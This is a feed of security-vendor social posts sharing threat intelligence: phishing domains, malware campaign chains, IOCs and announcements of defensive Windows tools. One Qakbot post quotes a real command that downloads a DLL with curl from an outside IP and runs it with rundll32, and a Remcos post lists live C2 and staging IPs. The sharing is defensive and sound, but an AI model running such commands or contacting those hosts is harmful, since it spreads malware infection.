A live 0 VT #Remcos + #Guloader active campaign ! Email -> PDF -> /mega.nz -> pass protected zip -> Shortcut to download + run VBS from opendir via PowerShell -> Inject -> Geolocation -> Remcos C2 Check for Opendir 194.180.48.211 Remcos C2 84.21.172.49 bazaar.abuse.ch/sample/4817f19…

Can't tell if the website you're visiting is fraudulent or not? URLVoid analyzes a website by cross-referencing over 30 blocklist services and reputation engines. urlvoid.com URLVoid #OSINT #infosec #cybersecurity #tool #intelligence #investigation #phishing

#Qakbot - BB15 - .one > .wsf > curl > .dll wscript.exe mikey.wsf cmd.exe /c curl -o fd.dll http://64.225.8.]202/1Moch7/160223 && rundll32 fd.dll,N115 Samples 👇 bazaar.abuse.ch/sample/f836077… bazaar.abuse.ch/sample/6f99171… IOC's github.com/pr0xylife/Qakb…

New #phishing URL impersonating our service at URLVoid | Domain: trustsentry[.]org | IP: 89.117.139.38 | ASN: AS47583 Hostinger | Creation Date: 2023-02-11T16:46:08Z | Registrar: Hostinger, UAB #cybersecurity #infosec #osint

New #phishing URL: hxxps://portail-sfr[.]cloudns[.]ph/espace/proteger/09d300703fa0cc1/login.php | IP: 20.123.217.16 | ASN: AS8075 Microsoft Security ClouDNS | Target: SFR #cybersecurity #infosec #osint

⚡️ We are happy to announce we are now integrated with URLVoid. This will help us expand the reach of our blocklist and provide broader instant protection to everyone in our space. 🫂 We keep growing together!

📈 We are growing together. Our blocklist has increased it's reach, from 402 million monthly active users (MAU) to over 403 million thanks to integrations with URLVoid, APIVoid and DNS0.eu.

New #phishing URL: hxxps://proseguirestrizioni[.]com/ | IP Address: 198.54.121.227 | ASN: AS22612 Namecheap.com | Creation Date: 2023-03-09T13:46:40Z | Target BNL BNP Paribas #cybersecurity #infosec #osint

New #phishing URL impersonating our service at URLVoid | Domain: trustentry[.]net | IP: 188.114.97.2 | ASN: AS13335 Cloudflare Trust & Safety | Creation Date: 2023-03-19T21:33:33Z | Registrar: NameSilo #cybersecurity #infosec #osint

Released NoVirusThanks SysHardener v2.4: Harden Windows 10/11 settings to mitigate #cybersecurity threats, unassociate file types (JS/VBS/ISO/HTA/PIF/etc), block outbound connections of commonly abused system processes ➨ bit.ly/3F7Intv #windows11 #sysadmin #cyberdefense

🚀 We've updated all 30+ Windows OS applications on Appsvoid.com during the past month ➡️ Added support for high-DPI, bugs fixes, new features and improvements #Windows11 #Windows10 #Cybersecurity #Infosec #Devops #Productivity #Software

New #phishing URL impersonating our service at URLVoid | Domain: trustguardian[.]org | IP: 89.117.139.208 | ASN: AS47583 Hostinger | Creation Date: 2023-04-07T21:32:13Z | Registrar: Hostinger #cybersecurity #infosec #osint

⚡️ We have recently added 15 new tools on IPVoid.com website: there are now more than 130 free web tools available that can help you with your everyday IT tasks #CyberSecurity #SysAdmin #SecOps #DevOps #DevTools #DFIR #InfoSec #Startups #OSINT

🚀Released NoVirusThanks USB Radar v1.6.0: Track #USB device events (when a USB device is plugged-in or unplugged, when a file is copied/moved from/to a USB device and files deleted on a USB device) ➨ usbradar.com #CyberSecurity #CyberDefense #DFIR #InfoSec

⚡️ Released NoVirusThanks OSArmor v1.8.7: An additional layer of defense to monitor and block suspicious process behaviors to prevent infections from #malware, #ransomware, and other threats ➨ bit.ly/3dKeRtR #CyberSecurity #CyberDefense #DFIR #InfoSec

New Blog Article: Fake “Copyright Infringement” Messages Lead to #Facebook #2FA Bypass, #phishing domain was registered only yesterday on 2023-10-16T19:09:33Z ➨ bit.ly/46zIzfL #Cybersecurity #Cyberdefense #InfoSec #Scam #OSINT Namecheap.com

⚡️ Released NoVirusThanks OSArmor v1.9.7: An additional layer of defense to monitor and block suspicious process behaviors to prevent infections from #malware, #ransomware, and other threats ➨ bit.ly/3dKeRtR #CyberSecurity #CyberDefense #DFIR #InfoSec

Added a new tool to quickly make a malicious URL harmless (hxxps[://] + [.]) and safe to share via email, you can also revert it back to the original value (unsafe and clickable) ➨ bit.ly/43wfEIW #cybersecurity #infosec #siem #threatintel #osint #dfir

On past days users reported some ticket payment scam targeting City of Montreal and SAAQ. The malicious domain hxxps[://]villedemontreal-constatcontravention[.]ca (78.142.228.106) was created just a few days ago and is now offline #cybersecurity #infosec #osint #threatintel

New #phishing URL impersonating GitHub installs #infostealer #malware via document.execCommand() and #powershell | Subject: Security Vulnerability Detected in your Repository | Phishing URL: hxxps://github-scanner[.]com #cybersecurity #infosec